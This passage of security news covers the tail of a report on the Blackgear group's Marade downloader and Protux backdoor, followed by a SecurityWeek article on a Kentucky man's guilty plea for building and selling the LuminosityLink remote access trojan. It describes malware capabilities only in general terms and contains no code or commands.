The more recent attacks start with an email delivering a fake installer or decoy document, which drop the Marade downloader. The downloader is placed in a file whose size exceeds 50 Mb in an effort to bypass traditional sandbox products.

Marade checks the infected system for an antivirus solution and retrieves C&C data from a blog or social media post. If the compromised machine is of interest, the Protux backdoor is downloaded.

Protux allows the attackers to list all the files, processes, services and registries on the compromised host, along with taking screenshots and creating a shell that provides access to the system.

“Blackgear has been targeting various industries since its emergence a decade ago. Its apparent staying power stems from the furtive ways with which its attacks can evade traditional security solutions,” Trend Micro researchers explained. “For instance, Blackgear employs two stages of infection for each of its attacks. The potential victim may not be able to notice the intrusions as the first stage involves only profiling and reconnaissance. And once infection with a backdoor occurs, typical red flags may not be raised as it abuses microblogging and social media services to retrieve information needed for C&C communication.”

Researchers have also stumbled upon a tool that provides the user interface from which the hackers control the Protux and Marade malware.

“Based on the controller’s behavior, we can posit that both Marade and Protux were authored by the same threat actors,” experts noted.

Malware Creator Admits to Building and Selling LuminosityLink RAT
19.7.2018 securityweek 

A Kentucky man admitted in a U.S. court to developing and distributing the remote access Trojan known as LuminosityLink.

21-year-old Colton Ray Grubbs of Stanford, Kentucky, pleaded guilty to developing the malware and selling it to thousands of people, knowing it would be used for computer intrusion, according to court documents.

Also known as Luminosity, the LuminosityLink RAT was first spotted in April 2015, providing its users with surveillance capabilities such as remote desktop and webcam and microphone access; a smart keylogger that could target specific programs; a crypto-currency miner; and distributed denial of service (DDoS) features.

In early February 2018, Europol and the UK’s National Crime Agency (NCA) announced an operation specifically targeting the sellers and users of Luminosity, but security researchers revealed soon after that the malware itself had been retired for over half a year.

According to the plea agreement obtained by investigative journalist Brian Krebs (PDF), Grubbs, who used the online handle of KFC Watermelon, admitted to have designed and sold LuminosityLink at $39.99 to over 6,000 customers between April 2015 and July 2017.

The malware was being distributed via the luminosity.link website and through the HackForums.net forum. Although he claimed the tool had legitimate purposes, being designed for system administration, the developer was touting capabilities that would allow potential customers to access and control systems without the legitimate owners’ knowledge or permissions.

According to the document filed in court, the hacker emphasized that the malware could be installed remotely without notification, as well as its keylogging and surveillance capabilities, file exfiltration functionality, the ability to steal login credentials, crypto-mining and DDoS features, and the ability to prevent detection and removal attempts from anti-malware software.

The document also claims that Grubbs was offering free support to customers, sending private messages to respond to “questions about accessing and controlling victim computers without authorization or detection.” He also admitted to recruiting other people to sell the malware as affiliates.

In July 2017, after learning the Federal Bureau of Investigation would raid his apartment, Grubbs warned the PayPal user who was collecting LuminosityLink payments, asked his roommate to hide a laptop in his car, and also concealed a debit card associated with his Bitcoin account and a phone storing his Bitcoin information.

“Defendant removed the hard drives from his desktop computer and removed them from his apartment before the authorized search so that they would not be seized by the government. Three days later, Defendant transferred over 114 bitcoin from his LuminosityLink bitcoin address into six new bitcoin addresses,” the plea agreement reads.

Overall, the hacker pleaded guilty to three counts, two of which carry maximum sentences of 5 years in prison and a fine of up to $250,000 each, while the third carries a maximum sentence of 20 years in prison and a fine of no more than $500,000.